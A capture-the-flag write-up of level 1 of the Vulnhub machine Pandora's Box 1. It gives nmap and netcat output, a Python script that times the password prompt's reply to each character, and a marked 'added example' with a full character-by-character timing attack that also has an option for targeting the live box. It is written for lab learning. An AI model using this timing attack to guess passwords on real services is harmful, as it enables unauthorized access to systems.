tick.Tack

Pandora’s Box 1 - Level 1

Pandora's Box 1 is another Vulnhub vulnerable machine; the author is c0ne.


Start by scanning the target with nmap. Apart from ssh on port 22, there is also a program listening on port 54311:

Starting Nmap 6.46 ( http://nmap.org ) at 2015-01-03 00:35 EST
Nmap scan report for 192.168.2.158
Host is up (0.00019s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
54311/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port54311-TCP:V=6.46%I=7%D=1/3%Time=54A77FA8%P=x86_64-unknown-linux-gnu
SF:%r(NULL,69,"#######################\n#\x20Secure\x20Remote\x20Shell\x20
SF:#\n#######################\nWelcome,\x20please\x20log\x20in\nPassword:\
SF:x20")%r(GenericLines,73,"#######################\n#\x20Secure\x20Remote
SF:\x20Shell\x20#\n#######################\nWelcome,\x20please\x20log\x20i
SF:n\nPassword:\x20Password:\x20")%r(GetRequest,85,"######################
SF:#\n#\x20Secure\x20Remote\x20Shell\x20#\n#######################\nWelcom
SF:e,\x20please\x20log\x20in\nPassword:\x20Invalid\x20password!\nPassword:
SF:\x20")%r(HTTPOptions,85,"#######################\n#\x20Secure\x20Remote
SF:\x20Shell\x20#\n#######################\nWelcome,\x20please\x20log\x20i
SF:n\nPassword:\x20Invalid\x20password!\nPassword:\x20")%r(RTSPRequest,85,
SF:"#######################\n#\x20Secure\x20Remote\x20Shell\x20#\n########
SF:###############\nWelcome,\x20please\x20log\x20in\nPassword:\x20Invalid\
SF:x20password!\nPassword:\x20")%r(RPCCheck,85,"#######################\n#
SF:\x20Secure\x20Remote\x20Shell\x20#\n#######################\nWelcome,\x
SF:20please\x20log\x20in\nPassword:\x20Invalid\x20password!\nPassword:\x20
SF:")%r(DNSVersionBindReq,73,"#######################\n#\x20Secure\x20Remo
SF:te\x20Shell\x20#\n#######################\nWelcome,\x20please\x20log\x2
SF:0in\nPassword:\x20Password:\x20")%r(DNSStatusRequest,73,"##############
SF:#########\n#\x20Secure\x20Remote\x20Shell\x20#\n#######################
SF:\nWelcome,\x20please\x20log\x20in\nPassword:\x20Password:\x20")%r(Help,
SF:85,"#######################\n#\x20Secure\x20Remote\x20Shell\x20#\n#####
SF:##################\nWelcome,\x20please\x20log\x20in\nPassword:\x20Inval
SF:id\x20password!\nPassword:\x20")%r(SSLSessionReq,A1,"##################
SF:#####\n#\x20Secure\x20Remote\x20Shell\x20#\n#######################\nWe
SF:lcome,\x20please\x20log\x20in\nPassword:\x20Invalid\x20password!\nPassw
SF:ord:\x20Invalid\x20password!\nPassword:\x20")%r(Kerberos,8F,"##########
SF:#############\n#\x20Secure\x20Remote\x20Shell\x20#\n###################
SF:####\nWelcome,\x20please\x20log\x20in\nPassword:\x20Password:\x20Invali
SF:d\x20password!\nPassword:\x20");
MAC Address: 00:0C:29:35:8B:92 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.78 seconds

Connecting to 54311 shows a password prompt:

root@kali:~/_Sec/vulnhub/pandora# nc 192.168.2.158 54311
#######################
# Secure Remote Shell #
#######################
Welcome, please log in
Password:

I blindly tried a few weak passwords, and also ran Kali Linux's built-in rockyou.txt against it for a while, with no result.

While trying a buffer overflow, I found that once the password is longer than 64 characters, the error message comes back twice.

And there is something even more interesting: the delay between sending a password and getting the reply doesn't seem to be the same every time.

This looks like it could be solved with a Timing Attack, which looks really cool when it runs.

First, a simple piece of code to measure how long each character takes:

    #!/usr/bin/env python3

    import string
    import time
    from socket import socket, AF_INET, SOCK_STREAM

    readable = string.ascii_letters + string.digits + string.punctuation
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(('192.168.2.158', 54311))
    data = s.recv(1024)        # banner
    print(data)
    data = s.recv(1024)        # "Password: " prompt, expected as a second read
    print(data)
    MAX_RUN = 6
    SendTime = {}
    for i in readable:
        SendTime[i] = 0.0

    # send every printable character MAX_RUN times and accumulate the time
    # between sending it and receiving the "Invalid password!" reply
    for count in range(0, MAX_RUN):
        for i in readable:
            s.send((i + '\n').encode())
            start = time.time()
            data = s.recv(1024)
            SendTime[i] += time.time() - start   # accumulate, so the average below covers all runs

    # report the character with the smallest average response time
    curMin = 999.0
    curMinChar = '-'
    for x, y in SendTime.items():
        avg = y / MAX_RUN
        if avg < curMin:
            curMin = avg
            curMinChar = x
    print(curMinChar + ": " + str(curMin))

After running it a few times, R comes out with the shortest time every time:

R: 0.000167489051819
R: 0.000175515810649
R: 0.000179370244344
R: 0.000188191731771

Next, upgrade the code so the password-guessing process can be shown off in style.

(After finishing this post I went and read other people's writeups and discovered asciinema, a great tool, and adopted it right away XD)
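The full character-by-character attack that the upgraded script performs, as an added example; this is not the post's code. The "Secure Remote Shell" is replaced by a constructed SimulatedTarget so the attack runs offline, and its leak model is an assumption: by default a wrong character costs extra time (matching the observation above that the right character replied fastest), with an alternative mode where each right character costs time instead. The SocketOracle class shows the same interface against a live host and port; its assumption that every guess is answered with a line ending in "Password: " is not verified here. The secret 'Rx9!qZ' is constructed and says nothing about the real password.

```python
#!/usr/bin/env python3
"""Character-by-character timing attack against a password prompt (added example)."""
import random
import socket
import statistics
import string
import time

CHARSET = string.ascii_letters + string.digits + string.punctuation


class SimulatedTarget:
    """Constructed stand-in for the service; check() returns (accepted, seconds).

    leak_on='mismatch': a wrong character costs an extra LEAK seconds, so the right
                        guess is the fastest (the direction observed in the post).
    leak_on='match':    each correct character costs LEAK (a sleep inside the compare
                        loop, say), so the right guess is the slowest.
    """
    LEAK = 200e-6     # simulated seconds
    JITTER = 50e-6    # uniform network/scheduler noise added to every reply

    def __init__(self, secret, leak_on='mismatch', seed=1):
        self.secret, self.leak_on, self.rng = secret, leak_on, random.Random(seed)

    def check(self, guess):
        cost = 0.0
        for g, s in zip(guess, self.secret):
            if g == s:
                if self.leak_on == 'match':
                    cost += self.LEAK
            else:
                if self.leak_on == 'mismatch':
                    cost += self.LEAK
                break  # compare stops at the first wrong byte
        return guess == self.secret, cost + self.rng.uniform(0, self.JITTER)


class SocketOracle:
    """Same interface against the live prompt.  Assumption: every guess is answered
    with a line plus a fresh 'Password: ' prompt, and a reply without
    'Invalid password' means success (which may never re-prompt, hence the timeout)."""
    def __init__(self, host, port, timeout=2.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self._read_reply()  # banner and first prompt

    def _read_reply(self):
        buf = b''
        try:
            while not buf.endswith(b'Password: '):
                chunk = self.sock.recv(1024)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
        return buf

    def check(self, guess):
        self.sock.sendall(guess.encode() + b'\n')
        start = time.perf_counter()
        reply = self._read_reply()
        return b'Invalid password' not in reply, time.perf_counter() - start


def rank_position(oracle, prefix, charset=CHARSET, runs=6):
    """Average the reply time of prefix+c over `runs` rounds for every candidate c.
    Rounds are interleaved across candidates so slow drift hits all of them equally.
    Returns (accepted_password or None, {c: mean_seconds})."""
    totals = dict.fromkeys(charset, 0.0)
    for _ in range(runs):
        for c in charset:
            accepted, elapsed = oracle.check(prefix + c)
            if accepted:
                return prefix + c, None
            totals[c] += elapsed
    return None, {c: t / runs for c, t in totals.items()}


def pick_outlier(means):
    """The wrong candidates cluster together; the right one is the single outlier,
    whichever direction the leak goes, so take the mean farthest from the median."""
    med = statistics.median(means.values())
    return max(means, key=lambda c: abs(means[c] - med))


def recover_password(oracle, max_len=64, runs=6):
    """Extend the known prefix one character at a time until the oracle accepts."""
    known = ''
    for _ in range(max_len):
        done, means = rank_position(oracle, known, runs=runs)
        if done is not None:
            return done
        known += pick_outlier(means)
    return None  # nothing accepted within max_len characters


if __name__ == '__main__':
    # against the box: recover_password(SocketOracle('192.168.2.158', 54311))
    print(recover_password(SimulatedTarget('Rx9!qZ')))
```

Choosing the outlier rather than the minimum is what makes the same code work whether the slow path is the wrong byte or the right byte; the direction only matters for the lead-in's interpretation, not for the loop. Against a real host the jitter is far larger than the simulated 50 µs, so `runs` needs to grow until the outlier stands clear of the pack.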

Once inside there are five levels in total, and level 2 looks like it needs some reverse engineering; I'll write that up in a new post next time.